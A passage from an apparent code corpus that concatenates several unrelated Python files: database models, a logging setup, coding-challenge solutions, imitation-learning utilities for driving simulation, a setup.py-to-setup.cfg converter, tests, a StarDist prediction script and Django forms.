    title = db.Column(db.String(256), unique=False)
description = db.Column(db.Text(), unique=False)
upvotes = many_to_many("Question", "User", backref_name="questions_upvote")
downvotes = many_to_many("Question", "User", backref_name="questions_downvote")
create_time = db.Column(db.DateTime(), default=datetime.now)
last_modified = db.Column(db.DateTime(), default=datetime.now)
class Reply(db.Model):
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
provider, provider_id = foreign_key("User", backref_name="replies")
host_question, q_id = foreign_key("Question", backref_name="replies")
content = db.Column(db.Text())
upvotes = many_to_many("Reply", "User", backref_name="replies_upvote")
downvotes = many_to_many("Reply", "User", backref_name="replies_downvote")
create_time = db.Column(db.DateTime(), default=datetime.now)
last_modified = db.Column(db.DateTime(), default=datetime.now)
class Comment(db.Model):
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
provider, provider_id = foreign_key("User", backref_name="comments")
host_question, q_id = foreign_key("Question", backref_name="comments")
host_reply, r_id = foreign_key("Reply", backref_name="comments")
content = db.Column(db.Text(), unique=False)
create_time = db.Column(db.DateTime(), default=datetime.now)
last_modified = db.Column(db.DateTime(), default=datetime.now)
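# Usage sketch (assumes a Flask app context with `db` bound via the usual
# application factory; not part of the original module):
#
#     user = User(username='ada', email='ada@example.org', password=b'\x00' * 32)
#     db.session.add(user)
#     paper = Paper(title='A title', abstract='...', authors='ada')
#     paper.owners.append(user)
#     db.session.add(paper)
#     db.session.commit()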
| 2.6875 | 3 |
log.py | GregMorford/testlogging | 0 | 11087 | <filename>log.py<gh_stars>0
import logging
## Logging Configuration ##
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
ch = logging.StreamHandler() # console handler
ch.setLevel(logging.INFO)
fh = logging.FileHandler('logfile.txt')
fh.setLevel(logging.INFO)
fmtr = logging.Formatter('%(asctime)s | [%(levelname)s] | (%(name)s) | %(message)s')
fh.setFormatter(fmtr)
logger.addHandler(fh)
logger.addHandler(ch) # disable this to stop console output. This is better than print statements as you can disable all console output in one spot instead of at every print statement.
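# Usage sketch from another module (assumes this file is importable as `log`):
#
#     from log import logger
#     logger.info('goes to logfile.txt via fh and to the console via ch')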
logger.critical(f'testing a critical message from {__name__}') | 3.1875 | 3 |
hackerrank/BetweenTwoSets.py | 0x8b/HackerRank | 3 | 11088 | #!/bin/python3
import os
def getTotalX(a, b):
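    # Count the integers x with max(a) <= x <= min(b) such that every element
    # of a divides x and x divides every element of b.  Worked example:
    # a = [2, 4], b = [16, 32, 96] -> x in {4, 8, 16}, so the answer is 3.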
c = 0
for i in range(max(a), min(b) + 1):
        if all(i % d == 0 for d in a) and all(d % i == 0 for d in b):
c += 1
return c
if __name__ == "__main__":
f = open(os.environ["OUTPUT_PATH"], "w")
nm = input().split()
n = int(nm[0])
m = int(nm[1])
a = list(map(int, input().rstrip().split()))
b = list(map(int, input().rstrip().split()))
total = getTotalX(a, b)
f.write(str(total) + "\n")
f.close()
| 3.203125 | 3 |
utils.py | LlamaSi/Adaptive-PSGAIL | 10 | 11089 |
import h5py
import numpy as np
import glob
import os, pdb
import tensorflow as tf
from rllab.envs.base import EnvSpec
from rllab.envs.normalized_env import normalize as normalize_env
import rllab.misc.logger as logger
from sandbox.rocky.tf.algos.trpo import TRPO
from sandbox.rocky.tf.policies.gaussian_mlp_policy import GaussianMLPPolicy
from sandbox.rocky.tf.policies.gaussian_gru_policy import GaussianGRUPolicy
from sandbox.rocky.tf.envs.base import TfEnv
from sandbox.rocky.tf.spaces.discrete import Discrete
from hgail.algos.hgail_impl import Level
from hgail.baselines.gaussian_mlp_baseline import GaussianMLPBaseline
from hgail.critic.critic import WassersteinCritic
from hgail.envs.spec_wrapper_env import SpecWrapperEnv
from hgail.envs.vectorized_normalized_env import vectorized_normalized_env
from hgail.misc.datasets import CriticDataset, RecognitionDataset
from hgail.policies.categorical_latent_sampler import CategoricalLatentSampler
from hgail.policies.gaussian_latent_var_gru_policy import GaussianLatentVarGRUPolicy
from hgail.policies.gaussian_latent_var_mlp_policy import GaussianLatentVarMLPPolicy
from hgail.policies.latent_sampler import UniformlyRandomLatentSampler
from hgail.core.models import ObservationActionMLP
from hgail.policies.scheduling import ConstantIntervalScheduler
from hgail.recognition.recognition_model import RecognitionModel
from hgail.samplers.hierarchy_sampler import HierarchySampler
import hgail.misc.utils
from julia_env.julia_env import JuliaEnv
'''
Const
NGSIM_FILENAME_TO_ID = {
'trajdata_i101_trajectories-0750am-0805am.txt': 1,
'trajdata_i101_trajectories-0805am-0820am.txt': 2,
'trajdata_i101_trajectories-0820am-0835am.txt': 3,
'trajdata_i80_trajectories-0400-0415.txt': 4,
'trajdata_i80_trajectories-0500-0515.txt': 5,
'trajdata_i80_trajectories-0515-0530.txt': 6
}'''
NGSIM_FILENAME_TO_ID = {
'trajdata_i101_trajectories-0750am-0805am.txt': 1,
'trajdata_i101-22agents-0750am-0805am.txt' : 1
}
'''
Common
'''
def maybe_mkdir(dirpath):
if not os.path.exists(dirpath):
os.mkdir(dirpath)
def partition_list(lst, n):
sublists = [[] for _ in range(n)]
for i, v in enumerate(lst):
sublists[i % n].append(v)
return sublists
def str2bool(v):
if v.lower() == 'true':
return True
return False
def write_trajectories(filepath, trajs):
np.savez(filepath, trajs=trajs)
def load_trajectories(filepath):
return np.load(filepath)['trajs']
def filename2label(fn):
s = fn.find('-') + 1
e = fn.rfind('_')
return fn[s:e]
def load_trajs_labels(directory, files_to_use=[0,1,2,3,4,5]):
filenames = [
'trajdata_i101_trajectories-0750am-0805am_trajectories.npz',
'trajdata_i101_trajectories-0805am-0820am_trajectories.npz',
'trajdata_i101_trajectories-0820am-0835am_trajectories.npz',
'trajdata_i80_trajectories-0400-0415_trajectories.npz',
'trajdata_i80_trajectories-0500-0515_trajectories.npz',
'trajdata_i80_trajectories-0515-0530_trajectories.npz'
]
filenames = [filenames[i] for i in files_to_use]
labels = [filename2label(fn) for fn in filenames]
filepaths = [os.path.join(directory, fn) for fn in filenames]
trajs = [load_trajectories(fp) for fp in filepaths]
return trajs, labels
'''
Component build functions
'''
'''
This is about as hacky as it gets, but I want to avoid editing the rllab
source code as much as possible, so it will have to do for now.
Add a reset(self, **kwargs) function to the normalizing environment
https://stackoverflow.com/questions/972/adding-a-method-to-an-existing-object-instance
'''
def normalize_env_reset_with_kwargs(self, **kwargs):
ret = self._wrapped_env.reset(**kwargs)
if self._normalize_obs:
return self._apply_normalize_obs(ret)
else:
return ret
def add_kwargs_to_reset(env):
normalize_env = hgail.misc.utils.extract_normalizing_env(env)
if normalize_env is not None:
normalize_env.reset = normalize_env_reset_with_kwargs.__get__(normalize_env)
'''end of hack, back to our regularly scheduled programming'''
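# Minimal illustration of the binding trick used above (sketch only): for any
# plain function f(self, ...), `obj.f = f.__get__(obj)` attaches it to that
# one instance as a bound method, which is exactly what add_kwargs_to_reset
# does with normalize_env_reset_with_kwargs.
#
#     class Box(object): pass
#     def describe(self): return 'a box'
#     b = Box()
#     b.describe = describe.__get__(b)
#     assert b.describe() == 'a box'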
# Raunak adding an input argument for multiagent video making
def build_ngsim_env(
args,
exp_dir='/tmp',
alpha=0.001,
vectorize=True,
render_params=None,
videoMaking=False):
basedir = os.path.expanduser('~/.julia/v0.6/NGSIM/data')
filepaths = [os.path.join(basedir, args.ngsim_filename)]
if render_params is None:
render_params = dict(
viz_dir=os.path.join(exp_dir, 'imitate/viz'),
zoom=5.
)
env_params = dict(
trajectory_filepaths=filepaths,
H=args.env_H,
primesteps=args.env_primesteps,
action_repeat=args.env_action_repeat,
terminate_on_collision=False,
terminate_on_off_road=False,
render_params=render_params,
n_envs=args.n_envs,
n_veh=args.n_envs,
remove_ngsim_veh=args.remove_ngsim_veh,
reward=args.env_reward
)
# order matters here because multiagent is a subset of vectorized
# i.e., if you want to run with multiagent = true, then vectorize must
# also be true
if args.env_multiagent:
env_id = 'MultiagentNGSIMEnv'
if videoMaking:
print('RAUNAK BHATTACHARRYA VIDEO MAKER IS ON')
env_id='MultiagentNGSIMEnvVideoMaker'
alpha = alpha * args.n_envs
normalize_wrapper = vectorized_normalized_env
elif vectorize:
env_id = 'VectorizedNGSIMEnv'
alpha = alpha * args.n_envs
normalize_wrapper = vectorized_normalized_env
else:
env_id = 'NGSIMEnv'
normalize_wrapper = normalize_env
print(env_params)
env = JuliaEnv(
env_id=env_id,
env_params=env_params,
using='AutoEnvs'
)
# get low and high values for normalizing _real_ actions
low, high = env.action_space.low, env.action_space.high
env = TfEnv(normalize_wrapper(env, normalize_obs=True, obs_alpha=alpha))
add_kwargs_to_reset(env)
return env, low, high
def build_critic(args, data, env, writer=None):
if args.use_critic_replay_memory:
critic_replay_memory = hgail.misc.utils.KeyValueReplayMemory(maxsize=3 * args.batch_size)
else:
critic_replay_memory = None
critic_dataset = CriticDataset(
data,
replay_memory=critic_replay_memory,
batch_size=args.critic_batch_size,
flat_recurrent=args.policy_recurrent
)
critic_network = ObservationActionMLP(
name='critic',
hidden_layer_dims=args.critic_hidden_layer_dims,
dropout_keep_prob=args.critic_dropout_keep_prob
)
critic = WassersteinCritic(
obs_dim=env.observation_space.flat_dim,
act_dim=env.action_space.flat_dim,
dataset=critic_dataset,
network=critic_network,
gradient_penalty=args.gradient_penalty,
optimizer=tf.train.RMSPropOptimizer(args.critic_learning_rate),
n_train_epochs=args.n_critic_train_epochs,
summary_writer=writer,
grad_norm_rescale=args.critic_grad_rescale,
verbose=2,
debug_nan=True
)
return critic
def build_policy(args, env, latent_sampler=None):
if args.use_infogail:
if latent_sampler is None:
latent_sampler = UniformlyRandomLatentSampler(
scheduler=ConstantIntervalScheduler(k=args.scheduler_k),
name='latent_sampler',
dim=args.latent_dim
)
if args.policy_recurrent:
policy = GaussianLatentVarGRUPolicy(
name="policy",
latent_sampler=latent_sampler,
env_spec=env.spec,
hidden_dim=args.recurrent_hidden_dim,
)
else:
print("GaussianLatentVarMLPPolicy")
policy = GaussianLatentVarMLPPolicy(
name="policy",
latent_sampler=latent_sampler,
env_spec=env.spec,
hidden_sizes=args.policy_mean_hidden_layer_dims,
std_hidden_sizes=args.policy_std_hidden_layer_dims
)
else:
if args.policy_recurrent:
print("GaussianGRUPolicy")
policy = GaussianGRUPolicy(
name="policy",
env_spec=env.spec,
hidden_dim=args.recurrent_hidden_dim,
output_nonlinearity=None,
learn_std=True
)
else:
print("GaussianMLPPolicy")
policy = GaussianMLPPolicy(
name="policy",
env_spec=env.spec,
hidden_sizes=args.policy_mean_hidden_layer_dims,
std_hidden_sizes=args.policy_std_hidden_layer_dims,
adaptive_std=True,
output_nonlinearity=None,
learn_std=True
)
return policy
def build_recognition_model(args, env, writer=None):
if args.use_infogail:
recognition_dataset = RecognitionDataset(
args.batch_size,
flat_recurrent=args.policy_recurrent
)
recognition_network = ObservationActionMLP(
name='recog',
hidden_layer_dims=args.recognition_hidden_layer_dims,
output_dim=args.latent_dim
)
recognition_model = RecognitionModel(
obs_dim=env.observation_space.flat_dim,
act_dim=env.action_space.flat_dim,
dataset=recognition_dataset,
network=recognition_network,
variable_type='categorical',
latent_dim=args.latent_dim,
optimizer=tf.train.AdamOptimizer(args.recognition_learning_rate),
n_train_epochs=args.n_recognition_train_epochs,
summary_writer=writer,
verbose=2
)
else:
recognition_model = None
return recognition_model
def build_baseline(args, env):
return GaussianMLPBaseline(env_spec=env.spec)
def build_reward_handler(args, writer=None):
reward_handler = hgail.misc.utils.RewardHandler(
use_env_rewards=args.reward_handler_use_env_rewards,
max_epochs=args.reward_handler_max_epochs, # epoch at which final scales are used
critic_final_scale=args.reward_handler_critic_final_scale,
recognition_initial_scale=0.,
recognition_final_scale=args.reward_handler_recognition_final_scale,
summary_writer=writer,
normalize_rewards=True,
critic_clip_low=-100,
critic_clip_high=100,
)
return reward_handler
def build_hierarchy(args, env, writer=None):
levels = []
latent_sampler = UniformlyRandomLatentSampler(
name='base_latent_sampler',
dim=args.latent_dim,
scheduler=ConstantIntervalScheduler(k=args.env_H)
)
for level_idx in [1,0]:
# wrap env in different spec depending on level
if level_idx == 0:
level_env = env
else:
level_env = SpecWrapperEnv(
env,
action_space=Discrete(args.latent_dim),
observation_space=env.observation_space
)
with tf.variable_scope('level_{}'.format(level_idx)):
# recognition_model = build_recognition_model(args, level_env, writer)
recognition_model = None
if level_idx == 0:
policy = build_policy(args, env, latent_sampler=latent_sampler)
else:
scheduler = ConstantIntervalScheduler(k=args.scheduler_k)
policy = latent_sampler = CategoricalLatentSampler(
scheduler=scheduler,
name='latent_sampler',
policy_name='latent_sampler_policy',
dim=args.latent_dim,
env_spec=level_env.spec,
latent_sampler=latent_sampler,
max_n_envs=args.n_envs
)
baseline = build_baseline(args, level_env)
if args.vectorize:
force_batch_sampler = False
if level_idx == 0:
sampler_args = dict(n_envs=args.n_envs)
else:
sampler_args = None
else:
force_batch_sampler = True
sampler_args = None
sampler_cls = None if level_idx == 0 else HierarchySampler
algo = TRPO(
env=level_env,
policy=policy,
baseline=baseline,
batch_size=args.batch_size,
max_path_length=args.max_path_length,
n_itr=args.n_itr,
discount=args.discount,
step_size=args.trpo_step_size,
sampler_cls=sampler_cls,
force_batch_sampler=force_batch_sampler,
sampler_args=sampler_args,
optimizer_args=dict(
max_backtracks=50,
debug_nan=True
)
)
reward_handler = build_reward_handler(args, writer)
level = Level(
depth=level_idx,
algo=algo,
reward_handler=reward_handler,
recognition_model=recognition_model,
start_itr=0,
end_itr=0 if level_idx == 0 else np.inf
)
levels.append(level)
# by convention the order of the levels should be increasing
# but they must be built in the reverse order
# so reverse the list before returning it
return list(reversed(levels))
'''
setup
'''
def latest_snapshot(exp_dir, phase='train'):
snapshot_dir = os.path.join(exp_dir, phase, 'log')
snapshots = glob.glob('{}/itr_*.pkl'.format(snapshot_dir))
latest = sorted(snapshots, reverse=True)[0]
return latest
def set_up_experiment(
exp_name,
phase,
exp_home='../../data/experiments/',
snapshot_gap=5):
maybe_mkdir(exp_home)
exp_dir = os.path.join(exp_home, exp_name)
maybe_mkdir(exp_dir)
phase_dir = os.path.join(exp_dir, phase)
maybe_mkdir(phase_dir)
log_dir = os.path.join(phase_dir, 'log')
maybe_mkdir(log_dir)
logger.set_snapshot_dir(log_dir)
logger.set_snapshot_mode('gap')
logger.set_snapshot_gap(snapshot_gap)
log_filepath = os.path.join(log_dir, 'log.txt')
logger.add_text_output(log_filepath)
return exp_dir
'''
data utilities
'''
def compute_lengths(arr):
sums = np.sum(np.array(arr), axis=2)
lengths = []
for sample in sums:
zero_idxs = np.where(sample == 0.)[0]
if len(zero_idxs) == 0:
lengths.append(len(sample))
else:
lengths.append(zero_idxs[0])
return np.array(lengths)
def normalize(x, clip_std_multiple=np.inf):
mean = np.mean(x, axis=0, keepdims=True)
x = x - mean
std = np.std(x, axis=0, keepdims=True) + 1e-8
up = std * clip_std_multiple
lb = - std * clip_std_multiple
x = np.clip(x, lb, up)
x = x / std
return x, mean, std
def normalize_range(x, low, high):
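    # maps low -> -1, (low + high) / 2 -> 0 and high -> +1, clipping anything
    # that falls outside [low, high]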
low = np.array(low)
high = np.array(high)
mean = (high + low) / 2.
half_range = (high - low) / 2.
x = (x - mean) / half_range
x = np.clip(x, -1, 1)
return x
def load_x_feature_names(filepath, ngsim_filename):
print(filepath)
f = h5py.File(filepath, 'r')
xs = []
traj_id = NGSIM_FILENAME_TO_ID[ngsim_filename]
    # in case this needs to allow for multiple files in the future
traj_ids = [traj_id]
for i in traj_ids:
if str(i) in f.keys():
xs.append(f[str(i)])
else:
raise ValueError('invalid key to trajectory data: {}'.format(i))
x = np.concatenate(xs)
feature_names = f.attrs['feature_names']
return x, feature_names
def load_data(
filepath,
act_keys=['accel', 'turn_rate_global'],
ngsim_filename='trajdata_i101_trajectories-0750am-0805am.txt',
debug_size=None,
min_length=50,
normalize_data=True,
shuffle=False,
act_low=-1,
act_high=1,
clip_std_multiple=np.inf):
# loading varies based on dataset type
x, feature_names = load_x_feature_names(filepath, ngsim_filename)
# optionally keep it to a reasonable size
if debug_size is not None:
x = x[:debug_size]
if shuffle:
idxs = np.random.permutation(len(x))
x = x[idxs]
# compute lengths of the samples before anything else b/c this is fragile
lengths = compute_lengths(x)
# flatten the dataset to (n_samples, n_features)
# taking only the valid timesteps from each sample
# i.e., throw out timeseries information
xs = []
for i, l in enumerate(lengths):
# enforce minimum length constraint
if l >= min_length:
xs.append(x[i,:l])
x = np.concatenate(xs)
# split into observations and actions
# redundant because the environment is not able to extract actions
obs = x
act_idxs = [i for (i,n) in enumerate(feature_names) if n in act_keys]
act = x[:, act_idxs]
if normalize_data:
# normalize it all, _no_ test / val split
obs, obs_mean, obs_std = normalize(obs, clip_std_multiple)
# normalize actions to between -1 and 1
act = normalize_range(act, act_low, act_high)
else:
obs_mean = None
obs_std = None
return dict(
observations=obs,
actions=act,
obs_mean=obs_mean,
obs_std=obs_std,
)
| 1.414063 | 1 |
setup_py_upgrade.py | asottile/setup-py-upgrade | 87 | 11090 | <reponame>asottile/setup-py-upgrade<filename>setup_py_upgrade.py
import argparse
import ast
import configparser
import io
import os.path
from typing import Any
from typing import Dict
from typing import Optional
from typing import Sequence
METADATA_KEYS = frozenset((
'name', 'version', 'url', 'download_url', 'project_urls', 'author',
'author_email', 'maintainer', 'maintainer_email', 'classifiers',
'license', 'license_file', 'description', 'long_description',
'long_description_content_type', 'keywords', 'platforms', 'provides',
'requires', 'obsoletes',
))
OPTIONS_AS_SECTIONS = (
'entry_points', 'extras_require', 'package_data', 'exclude_package_data',
)
OPTIONS_KEYS = frozenset((
'zip_safe', 'setup_requires', 'install_requires', 'python_requires',
'use_2to3', 'use_2to3_fixers', 'use_2to3_exclude_fixers',
'convert_2to3_doctests', 'scripts', 'eager_resources', 'dependency_links',
'tests_require', 'include_package_data', 'packages', 'package_dir',
'namespace_packages', 'py_modules', 'data_files',
# need special processing (as sections)
*OPTIONS_AS_SECTIONS,
))
FIND_PACKAGES_ARGS = ('where', 'exclude', 'include')
def is_setuptools_attr_call(node: ast.Call, attr: str) -> bool:
return (
# X(
(isinstance(node.func, ast.Name) and node.func.id == attr) or
# setuptools.X(
(
isinstance(node.func, ast.Attribute) and
isinstance(node.func.value, ast.Name) and
node.func.value.id == 'setuptools' and
node.func.attr == attr
)
)
class Visitor(ast.NodeVisitor):
def __init__(self) -> None:
self.sections: Dict[str, Dict[str, Any]] = {}
self.sections['metadata'] = {}
self.sections['options'] = {}
self._files: Dict[str, str] = {}
def visit_With(self, node: ast.With) -> None:
# with open("filename", ...) as fvar:
# varname = fvar.read()
if (
# with open(...)
len(node.items) == 1 and
isinstance(node.items[0].context_expr, ast.Call) and
isinstance(node.items[0].context_expr.func, ast.Name) and
node.items[0].context_expr.func.id == 'open' and
# "filename"
len(node.items[0].context_expr.args) > 0 and
isinstance(node.items[0].context_expr.args[0], ast.Str) and
# as fvar
isinstance(node.items[0].optional_vars, ast.Name) and
# varname =
len(node.body) == 1 and
isinstance(node.body[0], ast.Assign) and
len(node.body[0].targets) == 1 and
isinstance(node.body[0].targets[0], ast.Name) and
# fvar.read()
isinstance(node.body[0].value, ast.Call) and
isinstance(node.body[0].value.func, ast.Attribute) and
# .read()
node.body[0].value.func.attr == 'read' and
# fvar.
isinstance(node.body[0].value.func.value, ast.Name) and
(
node.body[0].value.func.value.id ==
node.items[0].optional_vars.id
)
):
varname = node.body[0].targets[0].id
filename = node.items[0].context_expr.args[0].s
self._files[varname] = filename
self.generic_visit(node)
def visit_Call(self, node: ast.Call) -> None:
if is_setuptools_attr_call(node, 'setup'):
for kwd in node.keywords:
if kwd.arg in METADATA_KEYS:
section = 'metadata'
elif kwd.arg in OPTIONS_KEYS:
section = 'options'
else:
raise SystemExit(
f'{kwd.arg}= is not supported in setup.cfg',
)
if (
isinstance(kwd.value, ast.Name) and
kwd.value.id in self._files
):
value = f'file: {self._files[kwd.value.id]}'
elif (
isinstance(kwd.value, ast.Call) and
is_setuptools_attr_call(kwd.value, 'find_packages')
):
find_section = {
k: ast.literal_eval(v)
for k, v in zip(FIND_PACKAGES_ARGS, kwd.value.args)
}
find_section.update({
kwd.arg: ast.literal_eval(kwd.value)
for kwd in kwd.value.keywords
if kwd.arg is not None # for mypy's sake
})
self.sections['options.packages.find'] = find_section
value = 'find:'
else:
try:
value = ast.literal_eval(kwd.value)
except ValueError:
raise NotImplementedError(f'unparsable: {kwd.arg}=')
self.sections[section][kwd.arg] = value
self.generic_visit(node)
def _list_as_str(lst: Sequence[str]) -> str:
if len(lst) == 1:
return lst[0]
else:
return '\n' + '\n'.join(lst)
def _dict_as_str(dct: Dict[str, str]) -> str:
return _list_as_str([f'{k}={v}' for k, v in dct.items()])
def _reformat(section: Dict[str, Any]) -> Dict[str, Any]:
new_section = {}
for key, value in section.items():
if isinstance(value, (list, tuple)):
new_section[key] = _list_as_str(value)
elif isinstance(value, dict):
new_section[key] = _dict_as_str(value)
else:
new_section[key] = value
return new_section
def main(argv: Optional[Sequence[str]] = None) -> int:
parser = argparse.ArgumentParser()
parser.add_argument('directory')
args = parser.parse_args(argv)
setup_py = os.path.join(args.directory, 'setup.py')
with open(setup_py, 'rb') as setup_py_f:
tree = ast.parse(setup_py_f.read(), filename=setup_py)
visitor = Visitor()
visitor.visit(tree)
for option_section in OPTIONS_AS_SECTIONS:
if option_section in visitor.sections['options']:
section = visitor.sections['options'].pop(option_section)
visitor.sections[f'options.{option_section}'] = section
for k in tuple(visitor.sections.get('options.extras_require', {})):
if k.startswith(':'):
deps = visitor.sections['options.extras_require'].pop(k)
ir = visitor.sections['options'].setdefault('install_requires', [])
for dep in deps:
ir.append(f'{dep};{k[1:]}')
sections = {k: _reformat(v) for k, v in visitor.sections.items() if v}
# always want these to start with a newline
for section in ('entry_points', 'package_data', 'exclude_package_data'):
for k, v in dict(sections.get(f'options.{section}', {})).items():
if '\n' not in v:
if k == '':
sections[f'options.{section}'].pop(k)
k = '*'
sections[f'options.{section}'][k] = f'\n{v}'
# always start project_urls with a newline as well
if sections.get('metadata', {}).get('project_urls'):
project_urls = sections['metadata']['project_urls']
if not project_urls.startswith('\n'):
sections['metadata']['project_urls'] = f'\n{project_urls}'
cfg = configparser.ConfigParser()
cfg.update(sections)
setup_cfg = os.path.join(args.directory, 'setup.cfg')
if os.path.exists(setup_cfg):
orig = configparser.ConfigParser()
orig.read(setup_cfg)
for section_name, section in orig.items():
for k, v in section.items():
# a shame `setdefault(...)` doesn't work
if not cfg.has_section(section_name):
cfg.add_section(section_name)
cfg[section_name][k] = v
with open(setup_py, 'w') as f:
f.write('from setuptools import setup\nsetup()\n')
sio = io.StringIO()
cfg.write(sio)
with open(setup_cfg, 'w') as f:
contents = sio.getvalue().strip() + '\n'
contents = contents.replace('\t', ' ')
contents = contents.replace(' \n', '\n')
f.write(contents)
print(f'{setup_py} and {setup_cfg} written!')
return 0
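# Typical invocation (sketch): point the tool at a project that still carries
# a declarative setup.py, e.g.
#
#     $ python setup_py_upgrade.py path/to/project
#     path/to/project/setup.py and path/to/project/setup.cfg written!
#
# after which setup.py is reduced to the two-line stub written above and the
# supported keyword arguments live in setup.cfg.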
if __name__ == '__main__':
raise SystemExit(main())
| 1.835938 | 2 |
main/models/__init__.py | prajnamort/LambdaOJ2 | 2 | 11091 | <gh_stars>1-10
from .user import User, MultiUserUpload
from .problem import Problem, TestData
from .submit import Submit
| 0.976563 | 1 |
2019/tests/test_Advent2019_10.py | davidxbuck/advent2018 | 1 | 11092 | <reponame>davidxbuck/advent2018<gh_stars>1-10
# pytest tests
import numpy as np
from Advent2019_10 import Day10
class TestDay10():
def test_instantiate(self):
test = Day10('../tests/test_Advent2019_10a.txt')
grid = ['.#..#',
'.....',
'#####',
'....#',
'...##']
grid = [list(x) for x in grid]
gridarray = np.array(grid).transpose()
boolgrid = (gridarray == "#")
assert (gridarray[3, :] == list('..#.#')).all()
assert (gridarray[:, 2] == list('#####')).all()
assert (boolgrid[:, 2] == [True, True, True, True, True]).all()
assert (test.asteroid_map == gridarray).all()
assert (test.boolean_asteroid_map == boolgrid).all()
| 2.71875 | 3 |
Hash Map/448. Find All Numbers Disappeared in an Array.py | xli1110/LC | 2 | 11093 | <reponame>xli1110/LC
class Solution:
def findDisappearedNumbers(self, nums: List[int]) -> List[int]:
if len(nums) < 1:
raise Exception("Invalid Array")
n = len(nums)
res = []
s = set()
for x in nums:
s.add(x)
for i in range(1, n + 1):
if i not in s:
res.append(i)
return res
| 3.171875 | 3 |
tests/test_demo.py | aaronestrada/flask-restplus-swagger-relative | 3 | 11094 | <gh_stars>1-10
import pytest
from tests.test_application import app
@pytest.fixture
def client():
client = app.test_client()
yield client
def test_hello_resource(client):
"""
Test if it is possible to access to /hello resource
:param client: Test client object
:return:
"""
response = client.get('/hello').get_json()
assert response['hello'] == 'world'
def test_asset_found(client):
"""
Test if Swagger assets are accessible from the new path
:param client: Test client object
:return:
"""
response = client.get('/this_is_a_new/path_for_swagger_internal_documentation/swaggerui/swagger-ui-bundle.js')
assert response.status_code is 200
| 2.484375 | 2 |
01_Introduction to Python/3-functions-and-packages/03_multiple-arguments.py | mohd-faizy/DataScience-With-Python | 5 | 11095 | <filename>01_Introduction to Python/3-functions-and-packages/03_multiple-arguments.py
'''
03 - Multiple arguments
In the previous exercise, the square brackets around imag in the documentation showed us that the
imag argument is optional. But Python also uses a different way to tell users about arguments being
optional.
Have a look at the documentation of sorted() by typing help(sorted) in the IPython Shell.
You'll see that sorted() takes three arguments: iterable, key and reverse.
key=None means that if you don't specify the key argument, it will be None. reverse=False means
that if you don't specify the reverse argument, it will be False.
In this exercise, you'll only have to specify iterable and reverse, not key. The first input you
pass to sorted() will be matched to the iterable argument, but what about the second input? To tell
Python you want to specify reverse without changing anything about key, you can use =:
sorted(___, reverse = ___)
Two lists have been created for you on the right. Can you paste them together and sort them in
descending order?
Note: For now, we can understand an iterable as being any collection of objects, e.g. a List.
Instructions:
- Use + to merge the contents of first and second into a new list: full.
- Call sorted() on full and specify the reverse argument to be True. Save the sorted list as
full_sorted.
- Finish off by printing out full_sorted.
'''
# Create lists first and second
first = [11.25, 18.0, 20.0]
second = [10.75, 9.50]
# Paste together first and second: full
full = first + second
# Sort full in descending order: full_sorted
full_sorted = sorted(full, reverse=True)
# Print out full_sorted
print(full_sorted) | 4.6875 | 5 |
Taller_Algoritmos_02/Ejercicio_10.py | Angelio01/algoritmos_programacion- | 0 | 11096 | <reponame>Angelio01/algoritmos_programacion-
"""
Entradas: 3 Valores flotantes que son el valor de diferentes monedas
Chelines autriacos --> float --> x
Dramas griegos --> float --> z
Pesetas --> float --> w
Salidas 4 valores flotantes que es la conversión de las anteriores monedas
Pesetas --> float --> x
Francos franceses --> float --> z
Dolares --> float --> a
Liras italianas --> float --> b
"""
# Entradas
x1 = float(input("Dime los chelines autríacos\n"))
z1 = float(input("Dime los dracmas griegos\n"))
w = float(input("Dime las pesetas\n"))
# Caja negra
x = (x1 * 956871)/100
z = z1/22.64572381
a = w/122499
b = (w*100)/9289
# Salidas
print(f"\n{x1} Chelines austríacos en pesetas son {x}\n{z1} Dracmas griegos en Francos franceses son {z}\n{w} Pesetas en Dolares son {a}\n{w} Pesetas en Liras italianas son {b}\n") | 3.921875 | 4 |
stardist/stardist_impl/predict_stardist_3d.py | constantinpape/deep-cell | 0 | 11097 | import argparse
import os
from glob import glob
import imageio
from tqdm import tqdm
from csbdeep.utils import normalize
from stardist.models import StarDist3D
def get_image_files(root, image_folder, ext):
# get the image and label mask paths and validate them
image_pattern = os.path.join(root, image_folder, f'*{ext}')
print("Looking for images with the pattern", image_pattern)
images = glob(image_pattern)
assert len(images) > 0, "Did not find any images"
images.sort()
return images
# could be done more efficiently, see
# https://github.com/hci-unihd/batchlib/blob/master/batchlib/segmentation/stardist_prediction.py
def run_prediction(image_files, model_path, root, prediction_folder):
# load the model
model_root, model_name = os.path.split(model_path.rstrip('/'))
model = StarDist3D(None, name=model_name, basedir=model_root)
res_folder = os.path.join(root, prediction_folder)
os.makedirs(res_folder, exist_ok=True)
# normalization parameters: lower and upper percentile used for image normalization
# maybe these should be exposed
lower_percentile = 1
upper_percentile = 99.8
ax_norm = (0, 1, 2)
for im_file in tqdm(image_files, desc="run stardist prediction"):
im = imageio.volread(im_file)
im = normalize(im, lower_percentile, upper_percentile, axis=ax_norm)
pred, _ = model.predict_instances(im)
im_name = os.path.split(im_file)[1]
save_path = os.path.join(res_folder, im_name)
imageio.imsave(save_path, pred)
def predict_stardist(root, model_path, image_folder, prediction_folder, ext):
print("Loading images")
image_files = get_image_files(root, image_folder, ext)
print("Found", len(image_files), "images for prediction")
print("Start prediction ...")
run_prediction(image_files, model_path, root, prediction_folder)
print("Finished prediction")
def main():
parser = argparse.ArgumentParser(description="Predict new images with a stardist model")
parser.add_argument('root', type=str, help="Root folder with image data.")
parser.add_argument('model_path', type=str, help="Where the model is saved.")
parser.add_argument('--image_folder', type=str, default='images',
help="Name of the folder with the training images, default: images.")
parser.add_argument('--prediction_folder', type=str, default='predictions',
help="Name of the folder where the predictions should be stored, default: predictions.")
parser.add_argument('--ext', type=str, default='.tif', help="Image file extension, default: .tif")
args = parser.parse_args()
predict_stardist(args.root, args.model_path, args.image_folder,
args.prediction_folder, args.ext)
if __name__ == '__main__':
main()
| 2.4375 | 2 |
estacionamientos/forms.py | ShadowManu/SAGE | 0 | 11098 | <reponame>ShadowManu/SAGE<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from django import forms
from estacionamientos.models import Estacionamiento, Reserva, Pago
class EstacionamientosForm(forms.ModelForm):
nombre_duenio = forms.CharField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Nombre del Dueño'}))
nombre_est = forms.CharField(widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': 'Nombre del Estacionamiento'}))
